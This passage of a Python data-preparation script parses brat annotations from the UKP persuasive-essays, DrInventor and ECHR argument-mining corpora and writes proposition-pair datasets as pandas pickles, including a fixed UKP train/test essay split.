            # candidate for extraction into a helper.
            current_label = current_label.replace("-", ".")
            current_label = current_label.replace("..", ".-")
            labels_splits = current_label.split(".")
            source_type = labels_splits[1]
            relation_type = labels_splits[2]
            source_to_target = False
            target_offset = labels_splits[3]
            source_id = str(doc_ID) + "_" + str(sent_id)
            target_id = ""
            if relation_type in relation_types:
                target_id = str(doc_ID) + "_" + str(sent_id + int(target_offset))
            else:
                relation_type = None
            if (relation_type in asymmetric_link_types) or (relation_type in symmetric_link_types):
                source_to_target = True
            sentences_row = {'text_ID': doc_ID,
                             'source_ID': source_id,
                             'target_ID': target_id,
                             'source_type': source_type,
                             'relation_type': relation_type,
                             'source_to_target': source_to_target,
                             'set': split,
                             'source_length': count,
                             'source_proposition': sentence,
                             }
            rows_by_id[source_id] = sentences_row
            sentences_rows.append(sentences_row)
            sent_ids.append(source_id)
            sent_id += 1
        if len(sent_ids) == 1:
            print("Document " + str(doc_ID) + " has only 1 sentence!")
        # addition to couples dataframe
        for sent_id_source in sent_ids:
            source_row = rows_by_id[sent_id_source]
            for sent_id_target in sent_ids:
                if sent_id_source == sent_id_target and not reflexive:
                    continue
                target_row = rows_by_id[sent_id_target]
                relation_type = None
                relation1to2 = False
                if source_row["target_ID"] == sent_id_target:
                    relation_type = source_row["relation_type"]
                    relation1to2 = source_row["source_to_target"]
                elif target_row["target_ID"] == sent_id_source:
                    # Reverse direction: mark as inverse relation.
                    relation_type = "inv_" + str(target_row["relation_type"])
                dataframe_row = {'text_ID': str(doc_ID),
                                 'source_proposition': source_row["source_proposition"],
                                 'source_ID': str(sent_id_source),
                                 'target_proposition': target_row["source_proposition"],
                                 'target_ID': str(sent_id_target),
                                 'source_type': source_row["source_type"],
                                 'target_type': target_row["source_type"],
                                 'relation_type': relation_type,
                                 'source_to_target': relation1to2,
                                 'source_length': source_row["source_length"],
                                 'target_length': target_row["source_length"],
                                 'set': split
                                 }
                row_list[split].append(dataframe_row)
                # CONTATORI (Italian: "counters") — disabled counter code kept
                # as an inert string expression.
                """
                if relation_type not in rel_count.keys():
                    rel_count[relation_type] = 0
                rel_count[relation_type] += 1
                if relation1to2 == True:
                    link_count += 1
                """
    pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
    if not os.path.exists(pickles_path):
        os.makedirs(pickles_path)
    if len(sentences_rows) > 0:
        dataframe = pandas.DataFrame(sentences_rows)
        # Fix the column order before pickling.
        dataframe = dataframe[['text_ID',
                               'source_proposition',
                               'source_ID',
                               # 'target_proposition',
                               'target_ID',
                               'source_type',
                               # 'target_type',
                               'relation_type',
                               'source_to_target',
                               'source_length',
                               # 'target_length',
                               'set']]
        dataframe_path = os.path.join(pickles_path, "sentences.pkl")
        dataframe.to_pickle(dataframe_path)
    for split in ["train", "validation", "test"]:
        if len(row_list[split]) > 0:
            dataframe = pandas.DataFrame(row_list[split])
            dataframe = dataframe[['text_ID',
                                   'source_ID',
                                   'target_ID',
                                   'source_type',
                                   'target_type',
                                   'relation_type',
                                   'source_to_target',
                                   'source_length',
                                   'target_length',
                                   'source_proposition',
                                   'target_proposition',
                                   'set']]
            dataframe_path = os.path.join(pickles_path, str(split) + ".pkl")
            dataframe.to_pickle(dataframe_path)
    print("TOKENS!")
    print(token_counter)
# Canonical train/test essay-ID split for the UKP persuasive-essays corpus;
# consumed by create_ukp_pickle() to select files "essay%03d".
ukp_train_ids = [1, 2, 3, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
                 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
                 37, 38, 39, 40, 41, 43, 44, 45, 46, 47, 48, 49, 50, 51, 53,
                 54, 55, 56, 57, 58, 59, 60, 62, 63, 64, 65, 66, 67, 69, 70,
                 73, 74, 75, 76, 78, 79, 80, 81, 83, 84, 85, 87, 88, 89, 90,
                 92, 93, 94, 95, 96, 99, 100, 101, 102, 105, 106, 107, 109,
                 110, 111, 112, 113, 114, 115, 116, 118, 120, 121, 122, 123,
                 124, 125, 127, 128, 130, 131, 132, 133, 134, 135, 137, 138,
                 140, 141, 143, 144, 145, 146, 147, 148, 150, 151, 152, 153,
                 155, 156, 157, 158, 159, 161, 162, 164, 165, 166, 167, 168,
                 170, 171, 173, 174, 175, 176, 177, 178, 179, 181, 183, 184,
                 185, 186, 188, 189, 190, 191, 194, 195, 196, 197, 198, 200,
                 201, 203, 205, 206, 207, 208, 209, 210, 213, 214, 215, 216,
                 217, 219, 222, 223, 224, 225, 226, 228, 230, 231, 232, 233,
                 235, 236, 237, 238, 239, 242, 244, 246, 247, 248, 249, 250,
                 251, 253, 254, 256, 257, 258, 260, 261, 262, 263, 264, 267,
                 268, 269, 270, 271, 272, 273, 274, 275, 276, 279, 280, 281,
                 282, 283, 284, 285, 286, 288, 290, 291, 292, 293, 294, 295,
                 296, 297, 298, 299, 300, 302, 303, 304, 305, 307, 308, 309,
                 311, 312, 313, 314, 315, 317, 318, 319, 320, 321, 323, 324,
                 325, 326, 327, 329, 330, 332, 333, 334, 336, 337, 338, 339,
                 340, 342, 343, 344, 345, 346, 347, 349, 350, 351, 353, 354,
                 356, 357, 358, 360, 361, 362, 363, 365, 366, 367, 368, 369,
                 370, 371, 372, 374, 375, 376, 377, 378, 379, 380, 381, 383,
                 384, 385, 387, 388, 389, 390, 391, 392, 394, 395, 396, 397,
                 399, 400, 401, 402]
# Held-out test essays (complement of the train split).
ukp_test_ids = [4, 5, 6, 21, 42, 52, 61, 68, 71, 72, 77, 82, 86, 91, 97, 98,
                103, 104, 108, 117, 119, 126, 129, 136, 139, 142, 149, 154,
                160, 163, 169, 172, 180, 182, 187, 192, 193, 199, 202, 204,
                211, 212, 218, 220, 221, 227, 229, 234, 240, 241, 243, 245,
                252, 255, 259, 265, 266, 277, 278, 287, 289, 301, 306, 310,
                316, 322, 328, 331, 335, 341, 348, 352, 355, 359, 364, 373,
                382, 386, 393, 398]
def create_ukp_pickle(dataset_path, dataset_version, link_types, dataset_type='train', validation=0, reflexive=False):
    """Build proposition-pair pandas pickles from the UKP essays corpus.

    Parses brat-style .ann files ('T' lines = propositions, 'R' lines =
    relations), renumbers propositions by textual order, restricts pairs to
    the same paragraph, and writes <dataset_type>.pkl (plus validation.pkl
    when a validation fraction in (0, 1) is given).

    NOTE: indentation of this function was reconstructed from a
    whitespace-mangled dump; counter placement is marked where ambiguous.
    """
    data_path = os.path.join(dataset_path, "original_data")
    normal_list = []
    validation_list = []
    idlist = []
    # Select the essay IDs belonging to the requested split.
    if (dataset_type=='train'):
        idlist = ukp_train_ids
    elif (dataset_type=='test'):
        idlist = ukp_test_ids
    else:
        idlist = range(500)
    prop_counter = {}
    rel_counter = {}
    val_prop_counter = {}
    val_rel_counter = {}
    for i in idlist:
        file_name = "essay" + "%03d" % (i)
        text_file_path = os.path.join(data_path, file_name + ".txt")
        if os.path.exists(text_file_path):
            split = dataset_type
            if validation > 0 and validation < 1:
                # Random per-document assignment to the validation split.
                p = random.random()
                if p < validation:
                    split = 'validation'
            text_file = open(text_file_path, 'r', encoding='utf-8')
            labels_file = open(os.path.join(data_path, file_name + ".ann"), 'r')
            labels_line = []
            raw_text = text_file.read()
            for splits in labels_file.read().split('\n'):
                labels_line.append(splits)
            text_file.close()
            labels_file.close()
            # elaborate the offsets of the paragraphs
            paragraphs_offsets = []
            start = 0
            while start < len(raw_text):
                try:
                    end = raw_text.index("\n", start)
                except ValueError:
                    end = len(raw_text)
                if end != start:
                    paragraphs_offsets.append([start, end])
                start = end + 1
            data = {'prop_labels': {},
                    'prop_offsets': {},
                    'start_offsets': {},
                    'T_ids': [],
                    'propositions': {}}
            for link_type in link_types:
                data[link_type] = []
            paragraphs = split_propositions(raw_text, paragraphs_offsets)
            # Parse the brat annotation lines.
            for line in labels_line:
                splits = line.split(maxsplit=4)
                if len(splits) <= 0:
                    continue
                if splits[0][0] == 'T':
                    # Proposition line: "T<n> <label> <start> <end> <text>".
                    T_id = int(splits[0][1:])-1
                    data['T_ids'].append(T_id)
                    data['prop_labels'][T_id] = splits[1]
                    data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
                    data['start_offsets'][int(splits[2])] = T_id
                    data['propositions'][T_id] = splits[4].split('\n')
                elif splits[0][0] == 'R':
                    # Relation line: "R<n> <type> Arg1:T<x> Arg2:T<y>".
                    source = int(splits[2][6:]) - 1
                    target = int(splits[3][6:]) - 1
                    data[splits[1]].append([source, target])
            # new order given by the start offsets
            new_order = {}
            new_id = 0
            # find the match between the starting offsets and set the new id
            for new_off in sorted(data['start_offsets'].keys()):
                for old_id in data['T_ids']:
                    old_off = data['prop_offsets'][old_id][0]
                    if new_off == old_off:
                        new_order[old_id] = new_id
                        new_id += 1
                        break
            # Rebuild 'data' with propositions renumbered by textual order.
            new_data = {'prop_labels': [-1]*len(data['prop_labels']),
                        'prop_offsets': [-1]*len(data['prop_labels']),
                        'propositions': [-1]*len(data['prop_labels']),}
            for link_type in link_types:
                new_data[link_type] = []
            for link_type in link_types:
                for link in data[link_type]:
                    old_source = link[0]
                    old_target = link[1]
                    new_source = new_order[old_source]
                    new_target = new_order[old_target]
                    new_data[link_type].append([new_source, new_target])
            for old_id in data['T_ids']:
                new_id = new_order[old_id]
                new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
                new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
                new_data['propositions'][new_id] = data['propositions'][old_id]
            data = new_data
            propositions = data['propositions']
            num_propositions = len(propositions)
            assert (num_propositions >= 1)
            for sourceID in range(num_propositions):
                source_start = data['prop_offsets'][sourceID][0]
                p_offsets = (-1, -1)
                par = -1
                # find the paragraph
                for paragraph in range(len(paragraphs)):
                    p_start = paragraphs_offsets[paragraph][0]
                    p_end = paragraphs_offsets[paragraph][1]
                    if p_end >= source_start >= p_start:
                        p_offsets = (p_start, p_end)
                        par = paragraph
                assert par != -1
                type1 = data['prop_labels'][sourceID]
                for targetID in range(num_propositions):
                    # proposition type
                    type2 = data['prop_labels'][targetID]
                    target_start = data['prop_offsets'][targetID][0]
                    if sourceID == targetID and not reflexive:
                        continue
                    # relations in different paragraphs are not allowed
                    if target_start < p_offsets[0] or target_start > p_offsets[1]:
                        continue
                    relation_type = None
                    relation1to2 = False
                    # relation type
                    for link_type in link_types:
                        links = data[link_type]
                        for link in links:
                            # DEBUG
                            # if not link[0][0] == link[0][1]:
                            #     raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
                            if link[0] == sourceID and link[1] == targetID:
                                if relation_type is not None and not relation_type == link_type:
                                    raise Exception('MORE RELATION FOR THE SAME PROPOSITIONS: document ' + file_name)
                                relation_type = link_type
                                relation1to2 = True
                            elif link[0] == targetID and link[1] == sourceID:
                                # Reverse direction: mark as inverse relation.
                                relation_type = "inv_" + link_type
                    dataframe_row = {'text_ID': str(i) + "_" + str(par),
                                     'rawtext': paragraphs[par],
                                     'source_proposition': propositions[sourceID][0],
                                     'source_ID': str(i) + "_" + str(par) + "_" + str(sourceID),
                                     'target_proposition': propositions[targetID][0],
                                     'target_ID': str(i) + "_" + str(par) + "_" + str(targetID),
                                     'source_type': type1,
                                     'target_type': type2,
                                     'relation_type': relation_type,
                                     'source_to_target': relation1to2,
                                     'set': split
                                     }
                    if split == 'validation':
                        validation_list.append(dataframe_row)
                        if relation_type not in val_rel_counter.keys():
                            val_rel_counter[relation_type] = 0
                        val_rel_counter[relation_type] += 1
                    else:
                        normal_list.append(dataframe_row)
                        if relation_type not in rel_counter.keys():
                            rel_counter[relation_type] = 0
                        rel_counter[relation_type] += 1
                    # NOTE(review): placement of the type counters (per pair vs.
                    # per source proposition) reconstructed from the mangled
                    # dump — confirm against the original repository.
                    if split == 'validation':
                        if type1 not in val_prop_counter.keys():
                            val_prop_counter[type1] = 0
                        val_prop_counter[type1] += 1
                    else:
                        if type1 not in prop_counter.keys():
                            prop_counter[type1] = 0
                        prop_counter[type1] += 1
    pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
    if not os.path.exists(pickles_path):
        os.makedirs(pickles_path)
    if len(normal_list) > 0:
        dataframe = pandas.DataFrame(normal_list)
        # Fix the column order before pickling.
        dataframe = dataframe[['text_ID',
                               'rawtext',
                               'source_proposition',
                               'source_ID',
                               'target_proposition',
                               'target_ID',
                               'source_type',
                               'target_type',
                               'relation_type',
                               'source_to_target',
                               'set']]
        dataframe_path = os.path.join(pickles_path, dataset_type + ".pkl")
        dataframe.to_pickle(dataframe_path)
    if len(validation_list) > 0:
        dataframe = pandas.DataFrame(validation_list)
        dataframe = dataframe[['text_ID',
                               'rawtext',
                               'source_proposition',
                               'source_ID',
                               'target_proposition',
                               'target_ID',
                               'source_type',
                               'target_type',
                               'relation_type',
                               'source_to_target',
                               'set']]
        dataframe_path = os.path.join(pickles_path, 'validation' + ".pkl")
        dataframe.to_pickle(dataframe_path)
    # Summary statistics.
    print("_______________")
    print(dataset_type)
    print(prop_counter)
    print(rel_counter)
    print("_______________")
    print("VALIDATION")
    print(val_prop_counter)
    print(val_rel_counter)
    print("_______________")
def create_inv_pickle(dataset_path, dataset_version, documents_path,
                      asymmetric_link_types, symmetric_link_types, s_non_link_types,
                      test=0.3, validation=0.14, maxdistance=50,
                      reflexive=False):
    """
    Creates a pickle for the DrInventor Corpus. The sections are considered as documents, therefore no links are allowed
    in different sections (but they are still logged). The "parts_of_same" links are exploited to create new links between
    components and different part of the same component: if T1 and T2 are linked as parts_of_same (the direction doesn't
    matter), and T1 is linked to T3, then also T2 is linked to T3 (same type of relation and same direction). A maximum
    distance between the links can be enforced.
    :param dataset_path: the working directory for the RCT dataset
    :param dataset_version: the name of the specific sub-dataset in exam
    :param documents_path: the path of the .ann and .txt file repository (regardless of the version)
    :param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
    :param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
    :param s_non_link_types: list of the symmetric relations that are not links. They will be treated as "non-links"
    :param test: fraction of documents randomly assigned to the test split
    :param validation: fraction of documents randomly assigned to the validation split
    :param maxdistance: number of maximum argumentative distance to be taken into account for links. A value <=0
                        means no limits
    :param reflexive: whether reflexive links should be added
    :return: None
    """
    for key in sorted(locals().keys()):
        print(str(key) + ":\t" + str(locals()[key]))
    assert (validation >= 0 and validation <= 1)
    assert (test >= 0 and test <= 1)
    relation_types = []
    relation_types.extend(asymmetric_link_types)
    relation_types.extend(symmetric_link_types)
    relation_types.extend(s_non_link_types)
    # only these relation types are considered when labelling a pair of propositions
    argumentative_relation_types = ('semantically_same', 'supports', 'contradicts')
    row_list = {"train": [], "test": [], "validation": []}
    rel_count = {"train": {}, "test": {}, "validation": {}}
    prop_count = {"train": {}, "test": {}, "validation": {}}
    link_count = {"train": 0, "test": 0, "validation": 0}
    documents_paths_list = []
    documents_names_list = os.listdir(documents_path)
    for document_name in documents_names_list:
        documents_paths_list.append(os.path.join(documents_path, document_name))
    del documents_names_list
    print(str(len(documents_paths_list)) + " documents found for " + documents_path)
    for document_path in documents_paths_list:
        document_name = os.path.basename(document_path)
        if ".ann" not in document_name:
            continue
        doc_ID = int(document_name.split(".")[0][1:])
        raw_text_name = str(document_name.split(".")[0]) + ".txt"
        raw_text_document = os.path.join(documents_path, raw_text_name)
        # random document-level split assignment
        split = "train"
        if validation > 0 or test > 0:
            p = random.random()
            if p < validation:
                split = 'validation'
            elif validation < p < test + validation:
                split = "test"
        labels_file = open(document_path, 'r', encoding="utf-8")
        text_file = open(raw_text_document, 'r', encoding="utf-8")
        raw_text = text_file.read()
        text_file.close()
        labels_line = []
        for splits in labels_file.read().split('\n'):
            labels_line.append(splits)
        labels_file.close()
        # elaborate the offsets of the paragraphs (sections are delimited by "<H1>" markers)
        paragraphs_offsets = []
        start = raw_text.index("<H1>", 0)
        while start < len(raw_text):
            try:
                end = raw_text.index("<H1>", start)
            except ValueError:
                end = len(raw_text)
            if end != start:
                paragraphs_offsets.append([start, end])
            start = end + 1
        data = {'prop_labels': {},
                'prop_offsets': {},
                'T_ids': [],
                'propositions': {},
                'start_offsets': {}
                }
        for relation_type in relation_types:
            data[relation_type] = []
        paragraphs = split_propositions(raw_text, paragraphs_offsets)
        for line in labels_line:
            splits = line.split(maxsplit=4)
            if len(splits) <= 0:
                continue
            # if it is a component label
            if splits[0][0] == 'T':
                T_id = int(splits[0][1:]) - 1
                data['T_ids'].append(T_id)
                data['prop_labels'][T_id] = splits[1]
                data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
                # each starting offset is linked to a proposition ID
                data['start_offsets'][int(splits[2])] = T_id
                data['propositions'][T_id] = splits[4].split('\n')[0]
            # if it is a relation label
            elif splits[0][0] == 'R':
                source = int(splits[2][6:]) - 1
                target = int(splits[3][6:]) - 1
                relation = splits[1].lower()
                if relation in data.keys():
                    data[relation].append([source, target])
        # in case annotations are not made following the temporal order
        # new order given by the starting offsets
        new_order = {}
        new_id = 0
        # find the match between the starting offsets and set the new id
        # for each initial offset, from lowest to highest
        for offset in sorted(data['start_offsets'].keys()):
            # find the corresponding ID
            old_id = data['start_offsets'][offset]
            # give it the lowest ID
            new_order[old_id] = new_id
            # increase the lowest ID to assign
            new_id += 1
        # adjust data to the new order
        new_data = {'prop_labels': [-1] * len(data['prop_labels']),
                    'prop_offsets': [-1] * len(data['prop_labels']),
                    'propositions': [-1] * len(data['prop_labels']), }
        for relation_type in relation_types:
            new_data[relation_type] = []
        for relation_type in relation_types:
            for link in data[relation_type]:
                old_source = link[0]
                old_target = link[1]
                new_source = new_order[old_source]
                new_target = new_order[old_target]
                new_data[relation_type].append([new_source, new_target])
        for old_id in data['T_ids']:
            new_id = new_order[old_id]
            new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
            new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
            new_data['propositions'][new_id] = data['propositions'][old_id]
        data = new_data
        # TRANSITIVITY DUE OF PARTS_OF_SAME
        # create the chain of parts of same
        # links stored from last ID to first ID
        # (renamed min/max -> lo/hi to avoid shadowing the builtins)
        parts_of_same = {}
        for [source, target] in data["parts_of_same"]:
            lo = target
            hi = source
            if source < target:
                lo = source
                hi = target
            while hi in parts_of_same.keys():
                # found a previous relationship
                middle = parts_of_same[hi]
                # continue down the chain to find the place of lo
                if lo < middle:
                    hi = middle
                # lo belongs between hi and middle
                else:
                    parts_of_same[hi] = lo
                    hi = lo
                    lo = middle
            parts_of_same[hi] = lo
        # all the linked parts need to indicate the same id
        new_parts_of_same = {}
        for idmax in sorted(parts_of_same.keys()):
            idmin = parts_of_same[idmax]
            if idmin in parts_of_same.keys():
                idmin = parts_of_same[idmin]
                parts_of_same[idmax] = idmin
            new_parts_of_same[idmin] = set()
            new_parts_of_same[idmin].add(idmin)
        # create the sets
        for idmax in parts_of_same.keys():
            idmin = parts_of_same[idmax]
            new_parts_of_same[idmin].add(idmax)
        # index the sets from each component
        for idmin in new_parts_of_same.keys():
            same_set = new_parts_of_same[idmin]
            for element in same_set:
                parts_of_same[element] = same_set
        sys.stdout.flush()
        # propagate every relation to all the "parts_of_same" siblings of its endpoints
        # (FIX: use value inequality `!=` instead of identity `is not` — identity comparison
        # of ints is unreliable for values outside CPython's small-int cache)
        for relation_type in relation_types:
            new_relations = []
            for [source, target] in data[relation_type]:
                if source in parts_of_same.keys() and target in parts_of_same.keys():
                    for same_source in parts_of_same[source]:
                        for same_target in parts_of_same[target]:
                            if [same_source, same_target] not in data[relation_type] and same_source != same_target:
                                new_relations.append([same_source, same_target])
                elif source in parts_of_same.keys():
                    for same_source in parts_of_same[source]:
                        if [same_source, target] not in data[relation_type] and same_source != target:
                            new_relations.append([same_source, target])
                elif target in parts_of_same.keys():
                    for same_target in parts_of_same[target]:
                        if [source, same_target] not in data[relation_type] and source != same_target:
                            new_relations.append([source, same_target])
            data[relation_type].extend(new_relations)
        # CREATE THE PROPER DATAFRAME
        propositions = data['propositions']
        num_propositions = len(propositions)
        assert (num_propositions >= 1)
        for sourceID in range(num_propositions):
            source_start = data['prop_offsets'][sourceID][0]
            p_offsets = (-1, -1)
            par = -1
            # find the paragraph that contains the source proposition
            for paragraph in range(len(paragraphs)):
                p_start = paragraphs_offsets[paragraph][0]
                p_end = paragraphs_offsets[paragraph][1]
                if p_end >= source_start >= p_start:
                    p_offsets = (p_start, p_end)
                    par = paragraph
            type1 = data['prop_labels'][sourceID]
            for targetID in range(num_propositions):
                # proposition type
                type2 = data['prop_labels'][targetID]
                target_start = data['prop_offsets'][targetID][0]
                # relations in different paragraphs are not allowed, but we want to log them
                if target_start < p_offsets[0] or target_start > p_offsets[1]:
                    for relation_type in relation_types:
                        for link in data[relation_type]:
                            if link[0] == sourceID and link[1] == targetID:
                                # find the target paragraph, for logging purposes only
                                par_t = -1
                                for paragraph in range(len(paragraphs)):
                                    p_t_start = paragraphs_offsets[paragraph][0]
                                    p_t_end = paragraphs_offsets[paragraph][1]
                                    if p_t_end >= target_start >= p_t_start:
                                        par_t = paragraph
                                print("LINK OUTSIDE OF PARAGRAPHS!!!!")
                                print("source_proposition: " + propositions[sourceID])
                                print("source_ID: " + str(doc_ID) + "_" + str(par) + "_" + str(sourceID))
                                print("target_proposition: " + propositions[targetID])
                                print("target_ID: " + str(doc_ID) + "_" + str(par_t) + "_" + str(targetID))
                                print("relation: " + str(relation_type))
                    continue
                # skip reflexive relations if they are present
                if sourceID == targetID and not reflexive:
                    continue
                # if the two propositions are too distant, they are dropped
                if abs(sourceID-targetID) > maxdistance > 0:
                    continue
                relation_label = None
                relation1to2 = False
                # relation type
                for relation_type in argumentative_relation_types:
                    links = data[relation_type]
                    for link in links:
                        if link[0] == sourceID and link[1] == targetID:
                            # FIX: compare the previously assigned label with the current type
                            # (the old code compared relation_type with itself, which is always
                            # equal, so the conflict was never detected)
                            if relation_label is not None and not relation_label == relation_type:
                                raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
                                                + documents_path)
                            relation_label = relation_type
                            if relation_type in symmetric_link_types or relation_type in asymmetric_link_types:
                                relation1to2 = True
                        # create the symmetric or the asymmetric (inverse) relation
                        elif link[0] == targetID and link[1] == sourceID:
                            if relation_type in asymmetric_link_types:
                                relation_label = "inv_" + relation_type
                            elif relation_type in s_non_link_types:
                                relation_label = relation_type
                            elif relation_type in symmetric_link_types:
                                relation_label = relation_type
                                relation1to2 = True
                dataframe_row = {'text_ID': str(doc_ID) + "_" + str(par),
                                 'rawtext': "",  # paragraphs[par],
                                 'source_proposition': propositions[sourceID],
                                 'source_ID': str(doc_ID) + "_" + str(par) + "_" + str(sourceID),
                                 'target_proposition': propositions[targetID],
                                 'target_ID': str(doc_ID) + "_" + str(par) + "_" + str(targetID),
                                 'source_type': type1,
                                 'target_type': type2,
                                 'relation_type': relation_label,
                                 'source_to_target': relation1to2,
                                 'set': split
                                 }
                row_list[split].append(dataframe_row)
                # FIX: count the label actually assigned to the pair; the old code counted the
                # loop variable, which after the loop always holds the last relation type
                if relation_label not in rel_count[split].keys():
                    rel_count[split][relation_label] = 0
                rel_count[split][relation_label] += 1
                if relation1to2 == True:
                    link_count[split] += 1
                if type1 not in prop_count[split].keys():
                    prop_count[split][type1] = 0
                prop_count[split][type1] += 1
    for split in ["test", "train", "validation"]:
        pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
        if not os.path.exists(pickles_path):
            os.makedirs(pickles_path)
        if len(row_list[split]) > 0:
            dataframe = pandas.DataFrame(row_list[split])
            dataframe = dataframe[['text_ID',
                                   'source_proposition',
                                   'source_ID',
                                   'target_proposition',
                                   'target_ID',
                                   'source_type',
                                   'target_type',
                                   'relation_type',
                                   'source_to_target',
                                   'set']]
            dataframe_path = os.path.join(pickles_path, split + ".pkl")
            dataframe.to_pickle(dataframe_path)
        print("_______________")
        print(split)
        print(prop_count[split])
        print(rel_count[split])
        print("links: " + str(link_count[split]))
        print("_______________")
# TODO: fix the cases where the annotation includes ;
def create_ECHR_pickle(dataset_path, dataset_version, documents_path,
                       asymmetric_link_types, symmetric_link_types, a_non_link_types, s_non_link_types,
                       maxdistance=-1,
                       reflexive=False):
    """
    Creates train/test/validation pickles for the ECHR corpus. Documents are shuffled; the first one goes to
    the validation split, the next two to the test split, and the rest to the train split.
    :param dataset_path: the working directory for the RCT dataset
    :param dataset_version: the name of the specific sub-dataset in exam
    :param documents_path: the path of the .ann and .txt file repository (regardless of the version)
    :param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
    :param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
    :param a_non_link_types: list of the asymmetric relations that are not links. For these too, the "inv_..."
                             non-links will be created
    :param s_non_link_types: list of the symmetric relations that are not links. They will be treated as "non-links"
    :param maxdistance: number of maximum argumentative distance to be taken into account for links. A value <=0
                        means no limits
    :param reflexive: whether reflexive links should be added
    :return: None
    """
    for key in sorted(locals().keys()):
        print(str(key) + ":\t" + str(locals()[key]))
    relation_types = []
    relation_types.extend(asymmetric_link_types)
    relation_types.extend(a_non_link_types)
    relation_types.extend(symmetric_link_types)
    relation_types.extend(s_non_link_types)
    row_list = {"train": [], "test": [], "validation": []}
    rel_count = {"train": {}, "test": {}, "validation": {}}
    prop_count = {"train": {}, "test": {}, "validation": {}}
    link_count = {"train": 0, "test": 0, "validation": 0}
    # split-assignment counters: 1 document to validation, 2 to test, the rest to train
    n_test = 0
    n_val = 0
    n = 0
    documents_paths_list = []
    documents_names_list = os.listdir(documents_path)
    for document_name in documents_names_list:
        documents_paths_list.append(os.path.join(documents_path, document_name))
    del documents_names_list
    print(str(len(documents_paths_list)) + " documents found for " + documents_path)
    random.shuffle(documents_paths_list)
    for document_path in documents_paths_list:
        document_name = os.path.basename(document_path)
        if ".ann" not in document_name:
            continue
        doc_ID = n
        raw_text_name = document_name[:-4] + ".txt"
        raw_text_document = os.path.join(documents_path, raw_text_name)
        split = "train"
        if n_val < 1:
            split = 'validation'
            n_val += 1
        elif n_test < 2:
            split = "test"
            n_test += 1
        n += 1
        labels_file = open(document_path, 'r', encoding="utf-8")
        text_file = open(raw_text_document, 'r', encoding="utf-8")
        raw_text = text_file.read()
        text_file.close()
        labels_line = []
        for splits in labels_file.read().split('\n'):
            labels_line.append(splits)
        labels_file.close()
        data = {'prop_labels': {},
                'prop_offsets': {},
                'T_ids': [],
                'propositions': {},
                'start_offsets': {}
                }
        for relation_type in relation_types:
            data[relation_type] = []
        for line in labels_line:
            maxsplit = 4
            splits = line.split(maxsplit=maxsplit)
            if len(splits) <= 0:
                continue
            # if it is a component label
            if splits[0][0] == 'T':
                T_id = int(splits[0][1:]) - 1
                data['T_ids'].append(T_id)
                prop_label = splits[1]
                if prop_label == "major-claim":
                    prop_label = "claim"
                data['prop_labels'][T_id] = prop_label
                # in case of segmented annotation (";"-separated offset pairs), keep widening
                # the split until the whole offset list has been consumed
                b1 = int(splits[2])
                b2 = splits[maxsplit-1]
                while ";" in b2:
                    maxsplit += 1
                    splits = line.split(maxsplit=maxsplit)
                    b2 = splits[maxsplit-1]
                # TODO(review): for segmented annotations, splits[4] below is no longer the
                # proposition text — this is the known ";" issue flagged at the call sites
                data['prop_offsets'][T_id] = [b1, int(b2)]
                # each starting offset is linked to a proposition ID
                data['start_offsets'][int(splits[2])] = T_id
                data['propositions'][T_id] = splits[4].split('\n')[0]
            # if it is a relation label
            elif splits[0][0] == 'R':
                source = int(splits[2][6:]) - 1
                target = int(splits[3][6:]) - 1
                relation = splits[1]
                if relation in data.keys():
                    data[relation].append([source, target])
        # in case annotations are not made following the temporal order
        # new order given by the starting offsets
        new_order = {}
        new_id = 0
        # find the match between the starting offsets and set the new id
        # for each initial offset, from lowest to highest
        for offset in sorted(data['start_offsets'].keys()):
            # find the corresponding ID
            old_id = data['start_offsets'][offset]
            # give it the lowest ID
            new_order[old_id] = new_id
            # increase the lowest ID to assign
            new_id += 1
        # adjust data to the new order
        new_data = {'prop_labels': [-1] * len(data['prop_labels']),
                    'prop_offsets': [-1] * len(data['prop_labels']),
                    'propositions': [-1] * len(data['prop_labels']), }
        for relation_type in relation_types:
            new_data[relation_type] = []
        for relation_type in relation_types:
            for link in data[relation_type]:
                old_source = link[0]
                old_target = link[1]
                new_source = new_order[old_source]
                new_target = new_order[old_target]
                new_data[relation_type].append([new_source, new_target])
        for old_id in data['T_ids']:
            new_id = new_order[old_id]
            new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
            new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
            new_data['propositions'][new_id] = data['propositions'][old_id]
        data = new_data
        # CREATE THE PROPER DATAFRAME
        propositions = data['propositions']
        num_propositions = len(propositions)
        assert (num_propositions >= 1)
        for sourceID in range(num_propositions):
            type1 = data['prop_labels'][sourceID]
            for targetID in range(num_propositions):
                # proposition type
                type2 = data['prop_labels'][targetID]
                # skip reflexive relations if they are present
                if sourceID == targetID and not reflexive:
                    continue
                # if the two propositions are too distant, they are dropped
                if abs(sourceID-targetID) > maxdistance > 0:
                    continue
                relation_label = None
                relation1to2 = False
                # relation type
                for relation_type in relation_types:
                    links = data[relation_type]
                    for link in links:
                        # there is a direct relation
                        if link[0] == sourceID and link[1] == targetID:
                            if relation_label is not None and not relation_label == relation_type:
                                raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
                                                + document_path)
                            relation_label = relation_type
                            # there is a link
                            if relation_type in symmetric_link_types or relation_type in asymmetric_link_types:
                                relation1to2 = True
                        # there is an inverse relation
                        elif link[0] == targetID and link[1] == sourceID:
                            if relation_type in asymmetric_link_types or relation_type in a_non_link_types:
                                relation_label = "inv_" + relation_type
                            # symmetric relation, no link
                            elif relation_type in s_non_link_types:
